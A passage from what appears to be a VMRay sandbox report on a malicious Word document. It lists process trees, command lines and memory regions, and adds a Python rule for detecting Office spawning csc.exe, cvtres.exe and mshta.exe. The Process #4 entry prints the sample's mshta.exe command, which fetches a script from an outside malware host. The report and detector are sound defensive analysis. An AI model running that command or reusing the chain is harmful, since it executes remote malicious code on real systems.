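    "t+5s 10.0.0.5 GET http://wsdl.example.invalid/svc?a=1&b=2 200",
]

if __name__ == "__main__":
    for url, dll in artifacts_from_proxy_log(SAMPLE_PROXY_LOG).items():
        print(f"{url} -> {dll}")
```

The forward mapping is all that is safe to use: reversing it is ambiguous, because a literal digit in the URL and a substituted '/' both appear as '0' in the file name, so hunt from URLs to file names, not the other way round.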
Process #2: csc.exe
(Host: 2, Network: 0)
Information Value
ID #2
File Name c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe
Command Line "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:02:36, Reason: Terminated by Timeout
Monitor Duration 00:01:36
OS Process Information
Information Value
PID 0xba0
Parent PID 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010989 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BA4
0x 0
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable True False False
private_0x0000000000150000 0x00150000 0x00151fff Private Memory Readable, Writable True True False
locale.nls 0x00160000 0x001c6fff Memory Mapped File Readable False False False
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory Readable True False False
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x00210fff Private Memory Readable, Writable True True False
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000230000 0x00230000 0x00236fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000240000 0x00240000 0x00241fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory Readable True False False
private_0x0000000000260000 0x00260000 0x0035ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000360000 0x00360000 0x00360fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000370000 0x00370000 0x00370fff Pagefile Backed Memory Readable True False False
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory Readable, Writable True True False
cscompui.dll 0x00390000 0x003b2fff Memory Mapped File Readable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable True False False
csc.exe 0x00400000 0x00418fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000420000 0x00420000 0x00420fff Private Memory Readable, Writable True True False
private_0x0000000000430000 0x00430000 0x0052ffff Private Memory Readable, Writable True True False
system.runtime.remoting.dll 0x00530000 0x00579fff Memory Mapped File Readable True False False
private_0x00000000005e0000 0x005e0000 0x005effff Private Memory Readable, Writable True True False
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01d10000 0x01fdefff Memory Mapped File Readable False False False
pagefile_0x0000000001fe0000 0x01fe0000 0x023d2fff Pagefile Backed Memory Readable True False False
private_0x00000000023e0000 0x023e0000 0x024dffff Private Memory Readable, Writable True True False
private_0x00000000025a0000 0x025a0000 0x025affff Private Memory Readable, Writable True True False
private_0x00000000025b0000 0x025b0000 0x026affff Private Memory Readable, Writable True True False
private_0x0000000002700000 0x02700000 0x0277ffff Private Memory Readable, Writable True True False
private_0x00000000027a0000 0x027a0000 0x0281ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000002860000 0x02860000 0x028dffff Private Memory Readable, Writable, Executable True True False
private_0x0000000002980000 0x02980000 0x029fffff Private Memory Readable, Writable True True False
private_0x0000000002a00000 0x02a00000 0x02dfffff Private Memory Readable, Writable True True False
private_0x0000000002e00000 0x02e00000 0x02efffff Private Memory Readable, Writable True True False
private_0x0000000002f10000 0x02f10000 0x02f8ffff Private Memory Readable, Writable True True False
private_0x0000000002f90000 0x02f90000 0x0318ffff Private Memory - True True False
system.dll 0x03190000 0x0349afff Memory Mapped File Readable True False False
system.data.dll 0x034a0000 0x03793fff Memory Mapped File Readable True False False
system.xml.dll 0x037a0000 0x03993fff Memory Mapped File Readable True False False
system.web.services.dll 0x039a0000 0x03a6cfff Memory Mapped File Readable True False False
mscorlib.dll 0x03a70000 0x03ecafff Memory Mapped File Readable False False False
private_0x0000000003ed0000 0x03ed0000 0x03fcffff Private Memory Readable, Writable True True False
private_0x000000006fff0000 0x6fff0000 0x6fffffff Private Memory Readable, Writable, Executable True True False
msvcr80.dll 0x75360000 0x75428fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x775e0000 0x776d9fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x776e0000 0x777fefff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77800000 0x779a8fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x779d0000 0x779d6fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
diasymreader.dll 0x516f00000 0x516fc5fff Memory Mapped File Readable, Writable, Executable True False False
cscomp.dll 0x538000000 0x5381e8fff Memory Mapped File Readable, Writable, Executable True False False
alink.dll 0x59c800000 0x59c822fff Memory Mapped File Readable, Writable, Executable True False False
mscorwks.dll 0x7fee38d0000 0x7fee426cfff Memory Mapped File Readable, Writable, Executable True False False
mscoreei.dll 0x7fef13f0000 0x7fef1488fff Memory Mapped File Readable, Writable, Executable True False False
mscoree.dll 0x7fef1910000 0x7fef197efff Memory Mapped File Readable, Writable, Executable True False False
mscorpe.dll 0x7fef1af0000 0x7fef1b1bfff Memory Mapped File Readable, Writable, Executable True False False
c2r64.dll 0x7fef5860000 0x7fef5988fff Memory Mapped File Readable, Writable, Executable False False False
appvisvstream64.dll 0x7fef5990000 0x7fef5a09fff Memory Mapped File Readable, Writable, Executable False False False
appvisvsubsystems64.dll 0x7fef5a10000 0x7fef5c45fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-synch-l1-2-0.dll 0x7fef8f20000 0x7fef8f22fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x7fefc910000 0x7fefc91bfff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x7fefcaf0000 0x7fefcb0dfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x7fefcd40000 0x7fefcd86fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x7fefd040000 0x7fefd056fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x7fefd640000 0x7fefd64efff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x7fefd750000 0x7fefd75efff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007fefd9c0000 0x7fefd9c0000 0x7fefd9cffff Private Memory Readable, Writable, Executable True True False
kernelbase.dll 0x7fefd9d0000 0x7fefda3afff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefdb40000 0x7fefdb6dfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefdd50000 0x7fefddeefff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x7fefde70000 0x7fefdf46fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefdf50000 0x7fefdf5dfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x7fefe1c0000 0x7fefe3c2fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x7fefe550000 0x7fefe5e8fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7fefe640000 0x7fefe76cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x7fefe770000 0x7fefe7e0fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x7fefe850000 0x7feff5d7fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7feff710000 0x7feff818fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff8c0000 0x7feff8defff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7feff8e0000 0x7feff9bafff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7feff9d0000 0x7feffa36fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7feffa40000 0x7feffb08fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feffb20000 0x7feffb20fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd6fff Private Memory Readable, Writable True True False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True True False
Threads
Thread 0xba4
(Host: 2, Network: 0)
Category Operation Information Success Count Logfile
COM Create interface = 31BCFCE2-DAFB-11D2-9F81-00C04F79A0A3, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1 Fn
COM Create interface = B81FF171-20F3-11D2-8DCC-00A0C9B00521, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1 Fn
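The process tree in this report is the detection opportunity: WINWORD.EXE (PID 0x9b0) launches csc.exe (0xba0) with a response file from %TEMP%, csc.exe launches cvtres.exe (0xbb8, Process #3 below), and WINWORD.EXE also launches mshta.exe. The script below is an added example (not part of the VMRay report, not VMRay's code) that runs an ancestry-aware rule over process-creation events. The four events are constructed from the report: PIDs, parent PIDs, image paths and command lines are taken from it, the timestamps are the monitor-start offsets, and the mshta.exe PID is assumed because the report does not list that child process.

```python
"""Flag the Office -> csc.exe / cvtres.exe / mshta.exe chain seen in this report.

Added example; not part of the VMRay report and not VMRay's code. Events are
constructed from the report's process information (see the comments).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: int          # seconds since analysis start (monitor start offset)
    pid: int
    ppid: int
    image: str
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Binaries a document viewer has no business launching, directly or indirectly.
LOLBINS = {"csc.exe", "vbc.exe", "cvtres.exe", "mshta.exe"}

EVENTS = [  # constructed from the report; 0xbc0 for mshta.exe is assumed
    ProcEvent(31, 0x9B0, 0x52C,
              r"c:\program files\microsoft office\root\office16\winword.exe",
              r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"'),
    ProcEvent(60, 0xBA0, 0x9B0,
              r"c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline"'),
    ProcEvent(62, 0xBB8, 0xBA0,
              r"c:\windows\microsoft.net\framework64\v2.0.50727\cvtres.exe",
              r'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY '
              r'/MACHINE:IX86 "/OUT:C:\Users\aETAdzjz\AppData\Local\Temp\RESEDB9.tmp" '
              r'"c:\Users\aETAdzjz\Desktop\CSCED98.tmp"'),
    ProcEvent(63, 0xBC0, 0x9B0,
              r"c:\windows\system32\mshta.exe", r"C:\Windows\System32\mshta.exe"),
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def chain_of(events, pid):
    """Image names from `pid` up through every ancestor we hold an event for.

    Stops at a PID with no event (explorer.exe here). A candidate parent that
    started after its child is rejected, a crude guard against PID reuse.
    """
    by_pid = {e.pid: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur is not None:
        chain.append(basename(cur.image))
        parent = by_pid.get(cur.ppid)
        cur = parent if parent is not None and parent.ts <= cur.ts else None
    return chain


def detect(events):
    """Return (rule, pid) findings.

    office_spawned_lolbin: a LOLBIN with an Office app anywhere in its ancestry,
        so cvtres.exe two hops below WINWORD.EXE is caught, not only direct children.
    codedom_compile_under_office: csc.exe driven by a response file
        ("/noconfig ... @file.cmdline"), the shape the .NET CodeDOM compiler
        invocation takes, with Office as an ancestor.
    """
    findings = []
    for e in events:
        name = basename(e.image)
        ancestors = chain_of(events, e.pid)[1:]
        under_office = any(a in OFFICE_APPS for a in ancestors)
        if name in LOLBINS and under_office:
            findings.append(("office_spawned_lolbin", e.pid))
        if (name == "csc.exe" and under_office
                and "/noconfig" in e.cmdline.lower() and "@" in e.cmdline):
            findings.append(("codedom_compile_under_office", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid:#x} chain {' <- '.join(chain_of(EVENTS, pid))}")
```

The ancestry walk matters because a parent-only rule sees cvtres.exe as a child of csc.exe, which is normal for a compile; it is the WINWORD.EXE two hops up that makes it abnormal. PowerShell's Add-Type produces the same csc.exe response-file shape legitimately, so the Office ancestor is part of the rule rather than the command line alone.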
Process #3: cvtres.exe
Information Value
ID #3
File Name c:\windows\microsoft.net\framework64\v2.0.50727\cvtres.exe
Command Line C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\aETAdzjz\AppData\Local\Temp\RESEDB9.tmp" "c:\Users\aETAdzjz\Desktop\CSCED98.tmp"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:02, Reason: Child Process
Unmonitor End Time: 00:02:36, Reason: Terminated by Timeout
Monitor Duration 00:01:34
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xbb8
Parent PID 0xba0 (c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010989 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xBBC
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable True False False
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory Readable, Writable True True False
cvtres.exe 0x00400000 0x0040cfff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000410000 0x00410000 0x0050ffff Private Memory Readable, Writable True True False
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable True True False
private_0x0000000000550000 0x00550000 0x0055ffff Private Memory Readable, Writable True True False
msvcr80.dll 0x75360000 0x75428fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x776e0000 0x777fefff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77800000 0x779a8fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
kernelbase.dll 0x7fefd9d0000 0x7fefda3afff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefdd50000 0x7fefddeefff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7fefe640000 0x7fefe76cfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff8c0000 0x7feff8defff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7feff8e0000 0x7feff9bafff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feffb20000 0x7feffb20fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd4fff Private Memory Readable, Writable True True False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True True False
Process #4: mshta.exe
(Host: 590, Network: 0)
Information Value
ID #4
File Name c:\windows\system32\mshta.exe
Command Line "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:02, Reason: Child Process
Unmonitor End Time: 00:02:36, Reason: Terminated by Timeout
Monitor Duration 00:01:34
OS Process Information
Information Value
PID 0xbc0
Parent PID 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010989 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xBC4, 0xBD8, 0xBE0, 0xBE4, 0xBE8, 0xBFC, 0x784, 0x82C, 0x84C, 0x878, 0x308, 0x6B4
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
imm32.dll 0x000c0000 0x000e8fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c1fff Pagefile Backed Memory Readable, Writable True False False
mshta.exe.mui 0x000d0000 0x000d0fff Memory Mapped File Readable, Writable False False False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False
rpcss.dll 0x00120000 0x0019cfff Memory Mapped File Readable False False False
rpcss.dll 0x00120000 0x0019cfff Memory Mapped File Readable False False False
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable, Writable True False False
index.dat 0x00130000 0x0013bfff Memory Mapped File Readable, Writable True False False
index.dat 0x00140000 0x00147fff Memory Mapped File Readable, Writable True False False
index.dat 0x00150000 0x0015ffff Memory Mapped File Readable, Writable True False False
index.dat 0x00160000 0x0019ffff Memory Mapped File Readable, Writable True False False
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False
private_0x00000000001b0000 0x001b0000 0x002affff Private Memory Readable, Writable True False False
pagefile_0x00000000002b0000 0x002b0000 0x002b0fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x002c0000 0x002c0fff Memory Mapped File Readable False False False
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002e0000 0x002e0000 0x002e1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002f0000 0x002f0000 0x002f1fff Pagefile Backed Memory Readable True False False
private_0x0000000000300000 0x00300000 0x00300fff Private Memory Readable, Writable True True False
pagefile_0x0000000000300000 0x00300000 0x00300fff Pagefile Backed Memory Readable True False False
private_0x0000000000310000 0x00310000 0x0036ffff Private Memory Readable, Writable True True False
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False
oleaccrc.dll 0x00350000 0x00350fff Memory Mapped File Readable False False False
private_0x0000000000360000 0x00360000 0x0036ffff Private Memory Readable, Writable True False False
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory Readable, Writable True False False
private_0x0000000000470000 0x00470000 0x0056ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000570000 0x00570000 0x00570fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000570000 0x00570000 0x00571fff Pagefile Backed Memory Readable True False False
private_0x00000000005d0000 0x005d0000 0x005dffff Private Memory Readable, Writable True False False
pagefile_0x00000000005e0000 0x005e0000 0x006befff Pagefile Backed Memory Readable True False False
private_0x00000000006d0000 0x006d0000 0x006dffff Private Memory Readable, Writable True False False
private_0x00000000006e0000 0x006e0000 0x007dffff Private Memory Readable, Writable True False False
pagefile_0x00000000007e0000 0x007e0000 0x00967fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000970000 0x00970000 0x00af0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000b00000 0x00b00000 0x01efffff Pagefile Backed Memory Readable True False False
private_0x0000000001f00000 0x01f00000 0x01ffffff Private Memory Readable, Writable True True False
private_0x0000000001f00000 0x01f00000 0x01f7ffff Private Memory Readable, Writable True True False
private_0x0000000001ff0000 0x01ff0000 0x01ffffff Private Memory Readable, Writable True False False
private_0x00000000020a0000 0x020a0000 0x0219ffff Private Memory Readable, Writable True False False
private_0x00000000021a0000 0x021a0000 0x0238ffff Private Memory Readable, Writable True True False
private_0x00000000021d0000 0x021d0000 0x022cffff Private Memory Readable, Writable True False False
private_0x0000000002310000 0x02310000 0x0238ffff Private Memory Readable, Writable True False False
sortdefault.nls 0x02390000 0x0265efff Memory Mapped File Readable False False False
pagefile_0x0000000002660000 0x02660000 0x029a2fff Pagefile Backed Memory Readable True False False
private_0x00000000029b0000 0x029b0000 0x02bcffff Private Memory Readable, Writable True True False
private_0x0000000002a20000 0x02a20000 0x02b1ffff Private Memory Readable, Writable True False False
private_0x0000000002b50000 0x02b50000 0x02bcffff Private Memory Readable, Writable True False False
private_0x0000000002bd0000 0x02bd0000 0x02dcffff Private Memory Readable, Writable True True False
private_0x0000000002c60000 0x02c60000 0x02cdffff Private Memory Readable, Writable True False False
private_0x0000000002d50000 0x02d50000 0x02dcffff Private Memory Readable, Writable True False False
private_0x0000000002e70000 0x02e70000 0x02f6ffff Private Memory Readable, Writable True False False
private_0x0000000002f70000 0x02f70000 0x0306ffff Private Memory Readable, Writable True False False
private_0x0000000003080000 0x03080000 0x0317ffff Private Memory Readable, Writable True False False
private_0x00000000031c0000 0x031c0000 0x032bffff Private Memory Readable, Writable True False False
private_0x0000000003300000 0x03300000 0x033fffff Private Memory Readable, Writable True False False
private_0x0000000003580000 0x03580000 0x0367ffff Private Memory Readable, Writable True False False
private_0x0000000003690000 0x03690000 0x0378ffff Private Memory Readable, Writable True False False
user32.dll 0x775e0000 0x776d9fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x776e0000 0x777fefff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77800000 0x779a8fff Memory Mapped File Readable, Writable, Executable False False False
normaliz.dll 0x779c0000 0x779c2fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x779d0000 0x779d6fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
mshta.exe 0xff9d0000 0xff9dffff Memory Mapped File Readable, Writable, Executable True False False
mshtml.dll 0x7fee0880000 0x7fee1117fff Memory Mapped File Readable, Writable, Executable True False False
oleacc.dll 0x7fef22f0000 0x7fef2343fff Memory Mapped File Readable, Writable, Executable False False False
ieframe.dll 0x7fef2350000 0x7fef2f06fff Memory Mapped File Readable, Writable, Executable False False False
msimtf.dll 0x7fef3140000 0x7fef314dfff Memory Mapped File Readable, Writable, Executable False False False
rasman.dll 0x7fef3160000 0x7fef317bfff Memory Mapped File Readable, Writable, Executable False False False
rasapi32.dll 0x7fef3180000 0x7fef31e1fff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x7fef3c70000 0x7fef3c7bfff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x7fef46d0000 0x7fef46d7fff Memory Mapped File Readable, Writable, Executable False False False
msls31.dll 0x7fef6080000 0x7fef60bafff Memory Mapped File Readable, Writable, Executable False False False
sensapi.dll 0x7fef6630000 0x7fef6638fff Memory Mapped File Readable, Writable, Executable False False False
netprofm.dll 0x7fef6660000 0x7fef66d3fff Memory Mapped File Readable, Writable, Executable False False False
rtutils.dll 0x7fefadc0000 0x7fefadd0fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x7fefaf90000 0x7fefaf9afff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x7fefafa0000 0x7fefafb8fff Memory Mapped File Readable, Writable, Executable False False False
